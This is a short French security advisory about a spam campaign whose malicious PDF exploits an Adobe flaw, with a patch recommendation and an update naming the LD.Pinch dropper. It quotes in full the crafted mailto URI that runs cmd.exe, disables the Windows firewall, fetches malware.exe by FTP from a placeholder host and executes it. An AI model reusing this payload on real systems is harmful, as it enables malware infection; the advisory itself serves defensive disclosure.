Une campagne de spams contenant un fichier PDF malicieux exploitant la récente vulnérabilité des produits Adobe (Réf. Lexsi 9077) a été détectée aujourd'hui. Le fichier PDF est conçu de telle sorte qu'il télécharge via ftp un malware encore non reconnu par les solutions antivirales, par le biais d'une URI spécialement formée :

mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o xx.yy.zz.tt>1&echo binary>>1&echo get /malware.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start malware.exe&\" \"&\" "nul.bat

Chose amusante, le serveur délivrant le malware est hébergé ... chez RBN (Russian Business Network), hébergeur bien connu pour permettre à des organisations aux pratiques douteuses de mettre en place sur leurs serveurs toutes sortes de sites illégaux.

Le malware récupéré est actuellement en cours d'analyse.

Par chance, Adobe a publié hier un correctif pour cette vulnérabilité, dont les liens sont disponibles dans notre bulletin (Réf. Lexsi 9077). Nous conseillons vivement d'appliquer ce dernier, afin d'éviter des infections par des malwares encore non identifiés.

Mise à jour du 24/10 : ce matin à 10h (GMT+2), le malware qui s'est avéré être un "dropper" pour le malware LD.Pinch, est détecté par 8 antivirus.